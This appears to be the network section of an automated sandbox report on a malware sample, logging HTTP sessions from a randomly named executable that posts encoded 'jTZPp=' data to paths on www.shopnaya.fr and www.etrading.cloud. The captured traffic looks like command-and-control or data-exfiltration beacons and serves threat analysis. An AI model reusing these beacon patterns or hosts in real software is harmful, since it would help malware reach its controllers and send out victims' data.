                                Data Raw: 6a 54 5a 50 70 3d 5a 6e 6c 39 61 37 79 57 4e 30 52 66 41 6a 59 2f 57 45 54 74 76 4b 70 39 4c 61 66 63 74 36 6b 75 68 69 4d 2b 48 68 4e 5a 53 35 75 76 6a 68 48 71 49 4b 30 68 59 75 6d 56 6d 44 77 31 39 59 70 71 53 32 75 51 57 31 6b 37 68 63 43 37 78 38 63 52 39 69 46 69 67 66 4c 2b 77 67 33 35 49 30 62 33 72 6e 66 4b 39 6b 54 71 61 65 2b 4a 39 51 58 73 47 63 6f 47 61 4c 45 65 43 65 69 39 66 69 36 4c 4e 68 7a 59 62 38 58 79 64 35 59 32 73 30 50 4f 52 45 2b 30 74 50 49 31 52 52 6a 69 33 48 4d 57 6c 59 73 51 31 46 5a 47 70 31 47 41 47 6f 41 35 57 50 6b 41 37 30 41 66 48 74 39 48 4e 37 2f 38 4d 79 70 46 79 52 53 64 74 36 67 66 64 38 72 51 42 51 61 32 57 62 37 6b 76 37 48 50 57 4a 4b 71 43 67 3d 3d
                                Data Ascii: jTZPp=Znl9a7yWN0RfAjY/WETtvKp9Lafct6kuhiM+HhNZS5uvjhHqIK0hYumVmDw19YpqS2uQW1k7hcC7x8cR9iFigfL+wg35I0b3rnfK9kTqae+J9QXsGcoGaLEeCei9fi6LNhzYb8Xyd5Y2s0PORE+0tPI1RRji3HMWlYsQ1FZGp1GAGoA5WPkA70AfHt9HN7/8MypFyRSdt6gfd8rQBQa2Wb7kv7HPWJKqCg==
                                May 28, 2024 07:15:53.575499058 CEST423INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:53 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/
                                Expires: Tue, 28 May 2024 05:35:53 GMT
                                Cache-Control: max-age=1200
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.649719212.227.172.254801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:55.469028950 CEST1771OUTPOST /9rbi/ HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.shopnaya.fr
                                Referer: http://www.shopnaya.fr/9rbi/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 5a 6e 6c 39 61 37 79 57 4e 30 52 66 41 6a 59 2f 57 45 54 74 76 4b 70 39 4c 61 66 63 74 36 6b 75 68 69 4d 2b 48 68 4e 5a 53 34 36 76 6a 54 50 71 5a 64 67 68 5a 75 6d 56 6f 6a 77 30 39 59 70 72 53 79 36 55 57 31 59 52 68 65 4b 37 79 5a 49 52 73 7a 46 69 75 66 4c 2b 76 77 33 34 47 55 61 76 72 6e 50 4f 39 67 33 71 61 65 2b 4a 39 52 6e 73 57 5a 63 47 59 4c 45 66 46 65 69 35 49 53 37 6d 4e 68 37 49 62 38 62 49 64 4a 34 32 74 55 66 4f 53 78 71 30 75 76 49 33 63 78 6a 36 33 48 41 56 6c 59 77 79 31 47 45 72 70 79 32 41 45 38 74 46 4a 2b 63 66 74 6c 6b 48 54 76 5a 5a 57 2b 4c 41 55 7a 31 70 7a 77 37 72 6b 4b 35 31 51 71 6d 4f 49 6a 33 32 62 5a 4c 75 68 75 54 59 54 4e 54 48 52 6b 32 2b 6f 38 37 34 4a 65 5a 54 54 7a 6d 64 59 52 67 75 50 4a 52 76 66 33 2b 2f 56 54 37 6a 68 51 71 70 42 4f 79 30 33 4c 42 66 38 48 44 68 72 66 51 55 39 43 67 52 6f 69 6d 6f 72 65 4a 4c 4b 73 58 4f 4b 4e 7a 4b 37 58 4f 57 4a 39 7a 53 5a 38 6d 31 54 63 4d 55 2f 7a 4b 74 74 63 77 57 69 74 68 4c 71 54 67 6a 79 68 63 70 [TRUNCATED]
                                Data Ascii: jTZPp=Znl9a7yWN0RfAjY/WETtvKp9Lafct6kuhiM+HhNZS46vjTPqZdghZumVojw09YprSy6UW1YRheK7yZIRszFiufL+vw34GUavrnPO9g3qae+J9RnsWZcGYLEfFei5IS7mNh7Ib8bIdJ42tUfOSxq0uvI3cxj63HAVlYwy1GErpy2AE8tFJ+cftlkHTvZZW+LAUz1pzw7rkK51QqmOIj32bZLuhuTYTNTHRk2+o874JeZTTzmdYRguPJRvf3+/VT7jhQqpBOy03LBf8HDhrfQU9CgRoimoreJLKsXOKNzK7XOWJ9zSZ8m1TcMU/zKttcwWithLqTgjyhcp943JbwarkXreJuVIDe/VppOSn/cba/uc5zzlqoEsDK4PQs7khhhZj+u+/JGQj6PtgVsw7F4+w8miFrf8/pr5BsAI78A+gb0HwdpQqSYyYsvVR1ObQ6BHmg4lVYiyRzpU2e7cIBeyGv+RvxdhPIM82fi0SQm7DGzlNnkh7XswfVm+3PLRtMk9HDBDqe6FUPGWXHTWsGpxPTC3UjU6/03KX7eSPBvIs3yXcughFg1vWmJoaCkBlhBeGXo5jxHvPU/IK+CfuPX3epZ2F2x45rKyo2Swwaab1qIuPbxXnKZsMJTIB0L1VzWObRjgVmtPI2C9qPm4bM9/uBEGE6+ZEYRnUsBtyL9WyjOPB6FICk1DRkPaW36iChgwwDW+WZsuFOX49S6V1QDMdrktujN5ayRjoZw279gUrkV9KUfb5aMeCaz4d/jrD4msm2p5jwtj9ZyplTCfVGl9MQuLadC+iZVH6xBy2PTb7+N6vkm4BoN8omFxjQuaVid9q7YBkQ3dShblTmp3m2CCfP6xWXM7QPEwXQDyAoVjF7hb3OKphHzcLq0cBomAOEbIYchGzz4gH0FBUTtIhiOy9FrsET7Olt76mr1zHrh1TIC2lFifPcueneRG1sUuCOys2yI2F9jEh9aazWKYE4k4Fm9sMOUknVkzgmfD26gEOFbUKL [TRUNCATED]
                                May 28, 2024 07:15:56.103212118 CEST423INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:56 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/
                                Expires: Tue, 28 May 2024 05:35:56 GMT
                                Cache-Control: max-age=1200
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.649720212.227.172.254801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:58.304367065 CEST475OUTGET /9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs= HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:15:58.947814941 CEST577INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:58 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs=
                                Expires: Tue, 28 May 2024 05:35:58 GMT
                                Cache-Control: max-age=1200
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.649721199.59.243.225801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:12.940994978 CEST743OUTPOST /gy0x/ HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.etrading.cloud
                                Referer: http://www.etrading.cloud/gy0x/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6e 31 46 31 70 67 5a 68 52 6f 5a 61 35 59 45 46 74 70 4b 48 35 6c 78 74 31 45 47 39 34 38 50 47 2b 36 56 4c 32 33 75 57 52 52 6b 62 63 44 49 5a 51 4d 51 36 6f 4d 44 34 70 59 45 70 31 6a 32 79 70 6f 30 6b 51 78 69 77 35 53 75 33 55 4f 30 35 71 6b 75 45 62 6f 72 37 62 4c 32 42 5a 71 2f 47 48 62 2b 52 44 71 6a 4a 71 61 67 77 76 76 76 6e 57 66 31 78 4f 43 4e 46 68 61 48 42 64 50 43 78 6d 57 74 78 52 6f 47 55 4a 56 35 44 74 69 67 46 71 61 58 45 52 57 65 51 41 64 6f 33 47 4a 48 35 73 37 31 58 2f 57 49 53 6e 6c 39 4e 44 43 47 76 65 37 4b 76 61 42 66 75 35 2b 6b 6a 32 48 57 36 41 57 4f 30 35 54 79 4c 6e 48 69 44
                                Data Ascii: jTZPp=n1F1pgZhRoZa5YEFtpKH5lxt1EG948PG+6VL23uWRRkbcDIZQMQ6oMD4pYEp1j2ypo0kQxiw5Su3UO05qkuEbor7bL2BZq/GHb+RDqjJqagwvvvnWf1xOCNFhaHBdPCxmWtxRoGUJV5DtigFqaXERWeQAdo3GJH5s71X/WISnl9NDCGve7KvaBfu5+kj2HW6AWO05TyLnHiD
                                May 28, 2024 07:16:13.409863949 CEST1236INHTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1122
                                x-request-id: 410a49e8-dbee-46da-88d5-7515d0b9583a
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==
                                set-cookie: parking_session=410a49e8-dbee-46da-88d5-7515d0b9583a; expires=Tue, 28 May 2024 05:31:13 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 57 62 34 78 4e 4a 48 2b 58 56 44 45 4d 4d 73 76 74 45 39 31 33 7a 35 67 38 6a 32 51 42 38 42 48 4c 49 75 68 66 66 65 4f 63 55 6b 65 57 38 30 55 63 66 6f 38 77 55 63 31 75 4d 6c 41 56 54 46 2f 77 38 71 38 41 52 36 6d 2f 75 59 4d 70 33 62 49 72 47 37 44 35 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:13.409884930 CEST575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDEwYTQ5ZTgtZGJlZS00NmRhLTg4ZDUtNzUxNWQwYjk1ODNhIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.649722199.59.243.225801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:15.498663902 CEST767OUTPOST /gy0x/ HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.etrading.cloud
                                Referer: http://www.etrading.cloud/gy0x/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6e 31 46 31 70 67 5a 68 52 6f 5a 61 72 73 34 46 68 75 65 48 78 6c 78 79 36 6b 47 39 74 4d 50 43 2b 36 5a 4c 32 79 65 47 52 6a 77 62 64 68 51 5a 54 4f 34 36 74 4d 44 34 68 34 45 73 34 44 32 35 70 6f 35 62 51 7a 32 77 35 53 71 33 55 4f 45 35 71 7a 36 44 4a 49 72 31 4f 62 32 44 45 61 2f 47 48 62 2b 52 44 75 4c 76 71 61 49 77 6f 66 66 6e 52 4f 31 79 51 53 4e 47 6d 61 48 42 4f 66 43 31 6d 57 73 6d 52 71 69 75 4a 58 42 44 74 67 34 46 37 6f 76 48 4c 47 65 57 45 64 70 57 4a 49 2b 62 67 72 6b 4a 68 6b 59 59 34 47 6c 4c 43 30 48 31 43 49 4b 4d 49 52 2f 73 35 38 38 52 32 6e 57 51 43 57 32 30 72 45 2b 73 6f 7a 48 67 32 63 50 4d 57 4b 6d 4b 76 73 54 41 4b 61 31 50 5a 73 56 35 51 67 3d 3d
                                Data Ascii: jTZPp=n1F1pgZhRoZars4FhueHxlxy6kG9tMPC+6ZL2yeGRjwbdhQZTO46tMD4h4Es4D25po5bQz2w5Sq3UOE5qz6DJIr1Ob2DEa/GHb+RDuLvqaIwoffnRO1yQSNGmaHBOfC1mWsmRqiuJXBDtg4F7ovHLGeWEdpWJI+bgrkJhkYY4GlLC0H1CIKMIR/s588R2nWQCW20rE+sozHg2cPMWKmKvsTAKa1PZsV5Qg==
                                May 28, 2024 07:16:15.989741087 CEST1236INHTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:15 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1122
                                x-request-id: a0e5c95c-f916-4fe1-b652-9dd4f0af39ef
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==
                                set-cookie: parking_session=a0e5c95c-f916-4fe1-b652-9dd4f0af39ef; expires=Tue, 28 May 2024 05:31:15 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 57 62 34 78 4e 4a 48 2b 58 56 44 45 4d 4d 73 76 74 45 39 31 33 7a 35 67 38 6a 32 51 42 38 42 48 4c 49 75 68 66 66 65 4f 63 55 6b 65 57 38 30 55 63 66 6f 38 77 55 63 31 75 4d 6c 41 56 54 46 2f 77 38 71 38 41 52 36 6d 2f 75 59 4d 70 33 62 49 72 47 37 44 35 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:15.989758015 CEST575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTBlNWM5NWMtZjkxNi00ZmUxLWI2NTItOWRkNGYwYWYzOWVmIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.649723199.59.243.225801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:18.471956968 CEST1780OUTPOST /gy0x/ HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.etrading.cloud
                                Referer: http://www.etrading.cloud/gy0x/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6e 31 46 31 70 67 5a 68 52 6f 5a 61 72 73 34 46 68 75 65 48 78 6c 78 79 36 6b 47 39 74 4d 50 43 2b 36 5a 4c 32 79 65 47 52 6a 6f 62 63 55 4d 5a 42 6f 77 36 75 4d 44 34 72 59 45 74 34 44 32 34 70 6f 51 53 51 7a 71 67 35 51 69 33 55 74 4d 35 2b 58 57 44 51 34 72 31 57 72 32 43 5a 71 2f 50 48 62 4f 56 44 71 58 76 71 61 49 77 6f 64 48 6e 48 50 31 79 53 53 4e 46 68 61 48 37 64 50 43 4e 6d 57 6c 54 52 71 32 2b 4a 6a 39 44 74 41 6f 46 35 39 44 48 41 47 65 55 44 64 70 30 4a 4a 43 74 67 72 34 37 68 68 6b 68 34 45 35 4c 41 31 76 76 47 36 53 42 64 67 54 70 6f 4f 55 59 36 43 75 6b 63 32 32 52 71 69 2b 6d 68 7a 66 65 79 63 58 62 62 4b 66 4d 76 76 7a 37 42 74 56 66 53 39 41 33 44 30 53 61 6c 36 59 35 43 31 6d 72 43 64 4a 5a 72 43 44 6d 48 64 6f 45 2f 78 4a 64 72 76 61 54 73 4b 4e 69 31 77 34 67 68 77 72 51 56 50 4a 45 62 48 36 37 4b 35 4c 38 70 58 70 4c 72 4c 42 72 79 58 66 4e 55 39 4a 36 6f 4b 79 6f 54 6c 43 36 76 58 65 79 4d 6b 65 4f 56 37 73 31 69 4e 43 38 57 4a 77 6e 75 6b 77 57 4f 6a 7a 44 [TRUNCATED]
                                Data Ascii: jTZPp=n1F1pgZhRoZars4FhueHxlxy6kG9tMPC+6ZL2yeGRjobcUMZBow6uMD4rYEt4D24poQSQzqg5Qi3UtM5+XWDQ4r1Wr2CZq/PHbOVDqXvqaIwodHnHP1ySSNFhaH7dPCNmWlTRq2+Jj9DtAoF59DHAGeUDdp0JJCtgr47hhkh4E5LA1vvG6SBdgTpoOUY6Cukc22Rqi+mhzfeycXbbKfMvvz7BtVfS9A3D0Sal6Y5C1mrCdJZrCDmHdoE/xJdrvaTsKNi1w4ghwrQVPJEbH67K5L8pXpLrLBryXfNU9J6oKyoTlC6vXeyMkeOV7s1iNC8WJwnukwWOjzDgXuaidXv7sfGcuwP4ShOxiljUS6af0yrurRtgI8SHuWLq1chaS5ETpV09DLGFzRAuP6Vv/tjXiAO3wpcE7224bHu01Dj0P8iKeEZ0LDIDIgxTstJSS6bBGtkaP3nkU7ptr97kkclsANZfAIKpZ4kV3tUOTkplRUHYO3qDcJ62iKNthA+4TYK2vSbQEs0pd3Z4f/i3wn+dMvvI3eAs5y6ngJvRllDle5DtA0ONaywhYkkk4LiIgpaYuTJtI2q4Wrk1Rgv46P2njlmKbhC4Aq4001nOIDPi69zOaE5I12jmLncUKIdNIR71IhgQxr/P3Y3ExriU3F30k7B9+gdZ1AnRfdmPIZmLw42IAZtjKGB8Brv0qtrxPVUbDw5FLjGFaR2dn3IgAAWSYnfzQtEIrPKCeYMPN66aqhA5RgtSafqTFpK/QUGQyrdsPbMB9Ut+KEFY02O02JW7kBUGjUOs68TcpObiM+R21czBqucZicrY4xaFBsFfPS3qo04c/hYBXHT+GlbjgUPC4GC5NY+h7sbVWVjA/rW4G9BLl/MSwVefTiCGa1qrfvnnba++akNenfA4mCqLBl8tgXmxivB+q/9UiGE5+YjCVfwWEq0Bdy18GM5/TMYSSgfiQHqrzorZW9hp/mE9nO25vA1qntDC+v0ZQB/Q/vUTX9upa [TRUNCATED]
                                May 28, 2024 07:16:18.937002897 CEST1236INHTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:18 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1122
                                x-request-id: 6344225b-e056-44b8-a4bd-7f92c6979a31
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==
                                set-cookie: parking_session=6344225b-e056-44b8-a4bd-7f92c6979a31; expires=Tue, 28 May 2024 05:31:18 GMT; path=/
                                connection: close
